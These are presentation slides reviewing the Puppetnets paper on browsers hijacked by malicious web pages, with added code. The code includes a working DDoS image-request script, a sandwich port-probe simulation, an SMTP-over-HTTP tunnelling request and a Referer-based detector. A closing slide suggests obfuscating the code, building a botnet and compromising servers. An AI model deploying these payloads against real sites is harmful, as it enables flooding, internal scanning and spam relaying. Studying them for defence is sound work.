Page 1: Puppetnets: Misusing Web Browsers as a Distributed Attack Infrastructure

Puppetnets: Misusing Web Browsers as a Distributed Attack Infrastructure

Paper By : V.T.Lam, S.Antonatos, P.Akritidis, K.G.Anagnostakis

Conference : ACM Conference on Computer and Communications Security 2006

Presented By : Ramanarayanan Ramani

Page 2

Scenario

Attacker

1. Compromise a web server
2. Embed malicious code in the web page
3. Clients access the web page and execute the malicious code

Clients are the puppets: they can be controlled for as long as they have the web page open in the browser.

Page 3

Puppetnet vs Botnet

• Not heavily dependent on the exploitation of specific implementation flaws
• The attacker does not have complete control over the actions of the participating nodes
• Participation in puppetnets is more dynamic

Page 4

Overview

• Attack scenarios using puppetnets
• Analysis of attack scenarios
• Defense against puppetnets
• Paper review
• Suggestions

Page 5

DDoS (Distributed Denial of Service)

Page 6

DDoS Sample Code:

    <script type="text/javascript">
      // Re-request the image every second; each assignment to src makes the
      // browser issue a fresh GET to the victim. The cache-busting query string
      // is not on the original slide; without it a successfully loaded image
      // would be served from the browser cache instead of the victim.
      function pingVictim() {
        var image1 = document.getElementById('img1');
        image1.src = 'http://www.victim.com/badurl.jpg?' + new Date().getTime();
        setTimeout(pingVictim, 1000);
      }
      setTimeout(pingVictim, 1000);
    </script>
    <body>
      <img id="img1" />
    </body>

Page 7

Worm Propagation

Page 8

Worm Propagation

• Embed the worm code in the web page
• Puppets perform scanning and try to propagate the worm code
• If outbound traffic from the server is blocked, the worm can still propagate through the web page
• A client behind a NAT/firewall can propagate the worm inside the protected network

Page 9

Reconnaissance probes

Page 10

Reconnaissance probes

Problem: browsers refuse access to the contents of an inline frame unless the source of the frame is in the same domain as the parent page (the same-origin policy), so the puppet's script cannot read the probe's response directly.

"Sandwich" the probe request between two requests to the malicious web site: the attacker's server sees the arrival times of those two requests, and the gap between them tells it how long the probe took.

Use the onload and onerror event handlers to chain the three requests and thereby sandwich the probe.
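The following is an added simulation of the sandwich probe; it is not code from the paper or from the slides. The hostname attacker.example, the per-host latencies and the timing thresholds are all constructed for the example. In a real browser the three loads are chained from onload/onerror handlers on an <img>; here a pluggable load function stands in for that so the logic runs offline.

```javascript
'use strict';

const ATTACKER = 'http://attacker.example'; // hypothetical puppetnet site

// Attacker side: log the arrival time of each marker request (virtual clock, ms).
function makeAttackerServer() {
  const arrivals = [];
  return {
    handle(url, now) { if (url.startsWith(ATTACKER + '/mark')) arrivals.push(now); },
    gapMs() {
      return arrivals.length >= 2 ? arrivals[arrivals.length - 1] - arrivals[arrivals.length - 2] : null;
    },
  };
}

// Puppet side. In a browser each step is started from the previous <img>'s
// onload/onerror handler; here `load(url)` returns true for onload and false
// for onerror, and the chain is driven synchronously for determinism.
function sandwichProbe(load, probeUrl) {
  const chain = [ATTACKER + '/mark?1', probeUrl, ATTACKER + '/mark?2'];
  const outcomes = [];
  for (const url of chain) outcomes.push(load(url)); // onerror does not stop the chain
  return outcomes;
}

// Attacker-side inference. Thresholds are assumptions for the example: a host
// that answers or refuses the connection does so quickly, while a filtered
// port makes the browser sit through its connect timeout.
function classify(gapMs, timeoutMs) {
  if (gapMs === null) return 'no-data';
  return gapMs >= timeoutMs ? 'filtered-or-down' : 'responded';
}

// Simulated network: constructed per-host latencies (ms); hosts not in the
// table hang until the browser's connect timeout. Marker requests are logged
// by the attacker server as they "arrive".
function makeSimulatedLoader(attacker, latencies, timeoutMs) {
  let clock = 0;
  return function load(url) {
    const host = new URL(url).host;
    const isAttacker = host === new URL(ATTACKER).host;
    const latency = isAttacker ? 5 : (latencies[host] !== undefined ? latencies[host] : timeoutMs);
    clock += latency;
    attacker.handle(url, clock);
    return isAttacker; // the probe never yields a valid image, so it fires onerror
  };
}

// One complete probe of host:port as seen from the attacker's log.
function probeHost(host, latencies, timeoutMs = 3000) {
  const attacker = makeAttackerServer();
  const load = makeSimulatedLoader(attacker, latencies, timeoutMs);
  sandwichProbe(load, `http://${host}/probe.gif`);
  const gapMs = attacker.gapMs();
  return { host, gapMs, verdict: classify(gapMs, timeoutMs) };
}

// Constructed sample: one internal host answers on 8080, another is filtered.
const SAMPLE_LATENCIES = { '10.0.0.5:8080': 40 };
```

The point of the simulation is that the puppet learns nothing it is not allowed to learn: only the attacker's server, which receives the two marker requests, sees the timing. Because the probe itself goes to an address inside the puppet's network, the victim's firewall sees an ordinary outbound browser connection from an internal machine.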

Page 11

Protocols other than HTTP

Limitation of puppetnets: bound to use HTTP, as part of the browser

Solution: tunnel SMTP/IRC/FTP... by wrapping the protocol messages in an HTTP message, e.g. for SMTP:

    GET /index.html HTTP/1.1
    Host: www.example.com:25
    HELO mydomain.com
    …
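As an added example (not code from the paper or the slides), the exchange below shows both sides of the SMTP-over-HTTP tunnel: the request a browser emits when a hidden form with enctype="text/plain" is auto-submitted to port 25, and a toy SMTP command handler that receives it. The mail host, addresses and message are constructed. The handler is not a real MTA; its `forbidden` option mimics the Postfix smtpd_forbidden_commands defense (by default CONNECT, GET and POST), which disconnects a client whose first "command" is an HTTP verb. A further caveat: current browsers refuse to connect to port 25 and a list of other well-known non-HTTP ports precisely because of this attack class, so the slide's request would not leave a modern browser at all.

```javascript
'use strict';

// Puppet side: the raw request a browser emits when a hidden form with
// enctype="text/plain" is auto-submitted to http://HOST:PORT/. The SMTP script
// is smuggled as the form field *name*, which text/plain encoding copies
// verbatim; "=" plus the (empty) value ends up on a line of its own.
function buildTunnelRequest(host, port, smtpScript) {
  const body = smtpScript + '=' + '\r\n';
  return [
    'POST / HTTP/1.1',
    `Host: ${host}:${port}`,
    'Content-Type: text/plain',
    `Content-Length: ${Buffer.byteLength(body)}`,
    '',
    body,
  ].join('\r\n');
}

// Server side: a toy SMTP command handler. Every line it receives is treated
// as a command; HTTP request and header lines are simply "unrecognized", so a
// lenient server carries on to the SMTP commands that follow.
function makeSmtpServer({ forbidden = [] } = {}) {
  const st = { inData: false, buf: [], messages: [], closed: false, transcript: [] };
  const reply = (code) => { st.transcript.push(code); return code; };
  return {
    messages: st.messages,
    transcript: st.transcript,
    feed(line) {
      if (st.closed) return null;
      if (st.inData) {
        if (line === '.') {
          st.messages.push(st.buf.join('\n'));
          st.buf = [];
          st.inData = false;
          return reply('250 2.0.0 queued');
        }
        st.buf.push(line);
        return null;
      }
      if (line === '') return null; // blank lines are ignored
      const verb = line.split(/[\s:]/)[0].toUpperCase();
      if (forbidden.includes(verb)) { st.closed = true; return reply('221 2.7.0 forbidden command, closing'); }
      switch (verb) {
        case 'HELO': case 'EHLO': return reply('250 mail.example');
        case 'MAIL': return reply('250 2.1.0 Ok');
        case 'RCPT': return reply('250 2.1.5 Ok');
        case 'DATA': st.inData = true; return reply('354 End data with <CR><LF>.<CR><LF>');
        case 'QUIT': st.closed = true; return reply('221 2.0.0 Bye');
        default: return reply('500 5.5.1 Command unrecognized');
      }
    },
  };
}

// Deliver the tunnelled request line by line and report what got through.
function runTunnel(request, serverOpts) {
  const server = makeSmtpServer(serverOpts);
  for (const line of request.split('\r\n')) server.feed(line);
  return { replies: server.transcript, messages: server.messages };
}

// Constructed sample script (hypothetical domain and addresses).
const SAMPLE_SCRIPT = [
  'HELO mydomain.com',
  'MAIL FROM:<puppet@mydomain.com>',
  'RCPT TO:<victim@mail.example>',
  'DATA',
  'Subject: sent from a puppet',
  '',
  'hello',
  '.',
  'QUIT',
].join('\r\n') + '\r\n';
```

Run with `runTunnel(buildTunnelRequest('mail.example', 25, SAMPLE_SCRIPT))` to see the lenient server answer the four HTTP lines with 500 and then accept the message; pass `{ forbidden: ['CONNECT', 'GET', 'POST'] }` to see the hardened server close the connection on the first line.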

Page 12

Exploiting cookie-authenticated services

Constraints:
• The inline frame needs to be able to post cookies; this works on Firefox, but not on IE
• Have knowledge about the structure and content of the form to be posted, as well as the target URL
• Be able to instruct browsers to automatically post such forms (supported by all browsers)

Page 13

Distributed malicious computations

Can be done through JavaScript, ActiveX or Java applets:
• ActiveX: produces an 'Accept' or 'Deny' dialog
• Applets: instantiate the JVM, but can be placed in hidden frames
• Script: slower, but can be hidden

Example: MD5 computation
• JavaScript: 380 checksums/sec
• Applet: 434K checksums/sec

A 1,000-node puppetnet can crack an MD5 hash as fast as a 128-node cluster.

Page 14 to 17

Analysis - DDoS

(Slides 14, 15 and 17 are figures; only the text below survived extraction.)

Two types of attacks:
• A simple attack aiming to maximize SYN packets (maxSYN)
• One aiming to maximize the ingress bandwidth consumed (maxURL)

* Figure: estimate for a 1000-node puppetnet

Page 18 to 20

Analysis – Worm Propagation: CodeRed Worm

CodeRed attacks IIS servers (web servers)
• A vulnerable population of 360,000 and a server scanning rate of 358 scans/min
• Browsers performing 36 scans/min

(Slides 19 and 20 are propagation plots and did not survive extraction.)
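The slide gives the inputs of the propagation analysis but the plots are lost. The added example below (not the paper's model or code) carries those numbers through the standard random-scanning epidemic model, in which each infected host probes random IPv4 addresses and the infected fraction a obeys da/dt = K a (1 - a) with K = (scans per minute) x (vulnerable hosts) / 2^32. The puppetnet variant is an assumption for illustration: every infected server is credited with a fixed number of browser puppets scanning at the slide's 36 scans/min, which simply raises the effective scan rate. The number of puppets per server is a constructed parameter, not a figure from the paper.

```javascript
'use strict';

const ADDRESS_SPACE = 2 ** 32;

// Random-scanning worm: an infected host probes `scansPerMin` random IPv4
// addresses per minute; each probe hits a vulnerable host with probability
// vulnerable / 2^32. K is the per-host infection rate in 1/minute.
function spreadRate(scansPerMin, vulnerable) {
  return (scansPerMin * vulnerable) / ADDRESS_SPACE;
}

// Logistic (SI) model: a = infected fraction, da/dt = K a (1 - a).
// Closed form for the time at which the infected fraction reaches f.
function timeToFraction(K, a0, f) {
  return Math.log((f / (1 - f)) * ((1 - a0) / a0)) / K;
}

// The same model stepped numerically (explicit Euler), as a cross-check and
// as the routine you would use to draw the curve.
function simulateMinutesToFraction(K, a0, f, dt = 0.1) {
  let a = a0;
  let t = 0;
  while (a < f) {
    a += K * a * (1 - a) * dt;
    t += dt;
  }
  return t;
}

// Puppetnet variant (assumption, not the paper's exact model): each infected
// server additionally gets `puppetsPerServer` browsers scanning at
// `browserScansPerMin`, so its effective scan rate rises by that much.
function compareWithPuppets({ vulnerable, serverScansPerMin, browserScansPerMin, puppetsPerServer }) {
  const a0 = 1 / vulnerable; // one infected host at t = 0
  const kServer = spreadRate(serverScansPerMin, vulnerable);
  const kPuppet = spreadRate(serverScansPerMin + puppetsPerServer * browserScansPerMin, vulnerable);
  return {
    kServer,
    kPuppet,
    halfServerMin: timeToFraction(kServer, a0, 0.5),
    halfPuppetMin: timeToFraction(kPuppet, a0, 0.5),
  };
}

// The slide's CodeRed figures; puppetsPerServer is a constructed parameter.
const CODERED = { vulnerable: 360000, serverScansPerMin: 358, browserScansPerMin: 36, puppetsPerServer: 10 };
```

For the slide's numbers K comes out at about 0.03 per minute (roughly the 1.8/hour fitted to the real CodeRed outbreak), so half of the 360,000 hosts are infected after about seven hours with server scanning alone. Because the time to any given fraction scales as 1/K, ten puppets per infected server (36 scans/min each) roughly double the scan rate and halve that time; a larger puppet population shortens it in the same proportion.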

Page 21 to 22

Analysis - Reconnaissance probes

(Slides 21 and 22 are figures and did not survive extraction.)

Page 23

Defense

• Disabling JavaScript
• Careful implementation of existing defenses
• Filtering using attack signatures
• Client-side behavioral controls
• Server-side controls and puppetnet tracing
• Server-directed client-side controls
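One concrete form of "server-side controls and puppetnet tracing" is to profile a victim server's own access log by Referer: a puppetnet's requests arrive from many different client addresses, all carrying the attacker's page as Referer, and for the maxSYN/maxURL attacks they target resources that do not exist. The added example below (not code from the paper or the slides) parses combined-format log lines, builds a per-Referer profile, flags hosts that match that pattern and drops their later requests. The log lines, host names, addresses and thresholds are constructed. The caveat a practitioner would add is that the Referer is under the attacker's control: a page can suppress it (for instance with a no-referrer referrer policy), so this traces cooperative puppetnets and must be paired with per-client rate limiting.

```javascript
'use strict';

// Combined log format with Referer and User-Agent, e.g.
// 10.1.1.7 - - [10/Oct/2006:13:55:36 +0000] "GET /x.jpg?1 HTTP/1.1" 404 209 "http://evil.example/p.html" "Mozilla/5.0"
const LINE_RE = /^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "([^"]*)" "([^"]*)"$/;

function parseLogLine(line) {
  const m = LINE_RE.exec(line);
  if (!m) return null;
  let referer = '-';
  if (m[6] !== '-') {
    try { referer = new URL(m[6]).host; } catch (e) { referer = 'malformed'; }
  }
  return { client: m[1], method: m[3], path: m[4], status: Number(m[5]), referer };
}

// Per-Referer-host profile: requests, distinct clients, distinct paths, errors.
function profileReferers(lines) {
  const profile = new Map();
  for (const line of lines) {
    const r = parseLogLine(line);
    if (!r) continue;
    if (!profile.has(r.referer)) {
      profile.set(r.referer, { requests: 0, errors: 0, clients: new Set(), paths: new Set() });
    }
    const p = profile.get(r.referer);
    p.requests++;
    if (r.status >= 400) p.errors++;
    p.clients.add(r.client);
    p.paths.add(r.path);
  }
  return profile;
}

// Heuristic: a third-party page that makes many different clients fetch
// mostly non-existent resources from us looks like a puppetnet, not like
// ordinary hotlinking. Thresholds are assumptions for the example.
function suspiciousReferers(profile, { minRequests = 5, minClients = 3, minErrorRate = 0.8, ownHosts = [] } = {}) {
  const out = [];
  for (const [host, p] of profile) {
    if (host === '-' || ownHosts.includes(host)) continue;
    if (p.requests >= minRequests && p.clients.size >= minClients && p.errors / p.requests >= minErrorRate) {
      out.push(host);
    }
  }
  return out.sort();
}

// Enforcement hook: drop a request whose Referer host is on the blocklist.
function shouldDrop(refererHeader, blocklist) {
  if (!refererHeader || refererHeader === '-') return false;
  try { return blocklist.includes(new URL(refererHeader).host); } catch (e) { return false; }
}

// Constructed sample log (hypothetical hosts and addresses): five puppets
// hitting bogus URLs from evil.example, two normal hotlinks, one direct hit.
const SAMPLE_LOG = [
  '10.1.1.7 - - [10/Oct/2006:13:55:36 +0000] "GET /badurl.jpg?101 HTTP/1.1" 404 209 "http://evil.example/p.html" "Mozilla/5.0"',
  '10.2.0.9 - - [10/Oct/2006:13:55:36 +0000] "GET /badurl.jpg?102 HTTP/1.1" 404 209 "http://evil.example/p.html" "Mozilla/5.0"',
  '10.3.4.1 - - [10/Oct/2006:13:55:37 +0000] "GET /badurl.jpg?103 HTTP/1.1" 404 209 "http://evil.example/p.html" "Mozilla/5.0"',
  '10.4.4.2 - - [10/Oct/2006:13:55:37 +0000] "GET /badurl.jpg?104 HTTP/1.1" 404 209 "http://evil.example/p.html" "Mozilla/5.0"',
  '10.5.8.3 - - [10/Oct/2006:13:55:38 +0000] "GET /badurl.jpg?105 HTTP/1.1" 404 209 "http://evil.example/p.html" "Mozilla/5.0"',
  '10.6.1.1 - - [10/Oct/2006:13:55:38 +0000] "GET /logo.png HTTP/1.1" 200 5120 "http://www.victim.com/index.html" "Mozilla/5.0"',
  '10.7.1.2 - - [10/Oct/2006:13:55:39 +0000] "GET /logo.png HTTP/1.1" 200 5120 "http://www.victim.com/index.html" "Mozilla/5.0"',
  '10.8.1.3 - - [10/Oct/2006:13:55:39 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
];
```

`suspiciousReferers(profileReferers(SAMPLE_LOG), { ownHosts: ['www.victim.com'] })` names evil.example and nothing else; the distinct-path count is what separates a maxURL attack (a fresh bogus URL per request, to defeat caching) from a broken but harmless hotlink that 404s repeatedly from one page.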

Page 24

Advantages

• Simple and very effective attack
• Light-weight compared to a botnet
• Uses HTTP, which makes detection difficult

Page 25

Disadvantages

• No complete control over the client
• Tough to compromise web servers (the paper does not explain how to do it)
• The View Source command on the HTML page will reveal the puppetnet code

Page 26

Suggestions

• Look into hiding the code using encoding, or embed the code into objects like Flash
• Use the puppetnet to create a botnet on the client machine
• Provide ideas on how to compromise the web server

Page 27

Questions?